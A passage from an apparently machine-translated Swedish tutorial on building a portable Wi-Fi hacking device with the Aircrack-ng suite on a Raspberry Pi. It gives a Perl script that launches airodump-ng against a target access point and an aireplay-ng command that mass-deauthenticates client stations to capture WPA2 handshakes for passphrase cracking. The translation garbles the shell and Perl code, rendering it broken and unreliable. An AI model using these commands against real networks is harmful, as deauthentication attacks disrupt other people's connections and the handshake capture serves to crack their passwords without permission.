Den 802.11 ninjan - bärbara 802.11 Hacking enhet (4 / 8 steg)
Steg 4: Aircrack-NG Suite
Aircrack-NG Suite
Den Aircrack-NG Suite är en uppsättning verktyg speciellt utformad för dataintrång 802.11-nätverk och nätverksmaskinvara. De utvecklades först av Christophe Devine tillbaka i 2004. Systemet innehåller verktyg för packet injektion/nätverk manipulation, paket sniffning, knäcka WEP/WPA-nycklar, hantera WiFi-kort, att bygga krypterade paket, skapa tunnlar, skapa en åtkomstpunkt och mycket mer.
Om du vill skapa en 802.11 Ninja utan WARCARRIER kan du alltid enkelt start-up Airodump-NG börja fånga 802.11 paket också, men vi behöver fortfarande en enhet i övervakningsläge (RFMON). Jag skulle fortfarande rekommendera användande ninja_kill skriptet ovan att stoppa alla processer som kommer att förstöra genomsökningen genom att störa 802.11 radio.
Först måste vi installera Aircrack-NG Suite på Pi genom att sammanställa det källkod som så,
mkdir -p/appdev/ac ** cd/appdev/ac
wget http://download.aircrack-ng.org/aircrack-ng-1.2-be...
lämplig-få installera libpcap-dev
tjära - zxvf aircrack-ng-1,2-beta1.tar.gz
CD aircrack-ng-1.2-beta1
göra & & göra installera
Sedan använda Airmon-ng att starta VAP "mon0" och börja Airodump-NG med ett filnamn. Jag skulle rekommendera att använda aktuellt datum/tid detta kan göras mycket enkelt i Perl. som vi ser i skriptet nedan.
#! / usr/bin/perl - w
Använd strikt;
min ($sec, $min, $hour, $mday, $mon, $year, $wday, $yday, $isdst) = localtime(time);
min $filename = ($year + 1900). " -". $mon." -". $mday." -". $timmen.": ". $min.": ". $sec." -80211_ninja_scan ";
system ("airodump-ng – kanal 7--bssid 00:11:22:33:44:55--Skriv $filename");
Detta startar Airodump-NG för att skanna på kanal 7 (2.442 GHz) och skapa ett nytt namn varje gång det startas. Detta sätt om placeras i den /etc/rc.local filen för att starta automatiskt, kan vi lätt hitta där våra skanningar är efter datum. För att använda Aireplay-NG för mass-deauthentication, kan vi använda Perl och check för börsnoterade "klienten stationer" från Airodump-NG CSV-utdata. För varje station, kan vi driva de (bara MAC-adressen) till en lista och sedan för varje element i listan, kan vi,
Aireplay-ng-0 3 - en < bssid > -e < essid > -c $element_from_array_mac_address mon0 < / essid >< / bssid >
som kommer att använda "mon0" som enheten och deauthenticate klienten tre gånger i hopp om att fånga ett WPA2 handslag för vid försök till spricka WPA2-lösenfrasen.